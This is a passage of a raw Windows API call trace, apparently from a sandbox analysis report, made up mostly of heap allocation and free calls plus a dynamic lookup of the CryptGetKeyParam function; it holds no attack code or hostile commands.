[0171.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0171.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2888 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0171.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0171.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.318] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0171.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0171.318] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0171.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0171.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0171.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0171.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0171.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0171.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0171.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0171.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0171.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0171.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0171.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0171.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0171.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.320] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0171.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0171.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0171.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0171.321] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0171.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0171.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0171.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0171.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0171.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0171.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0171.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0171.322] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0171.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0171.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0171.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0171.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0171.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0171.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0171.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0171.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0171.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0171.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0171.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0171.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0171.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0171.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0171.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0171.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0171.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0171.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0171.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0171.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0171.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0171.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0171.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0171.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0171.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0171.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0171.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0171.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0171.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0171.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.327] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 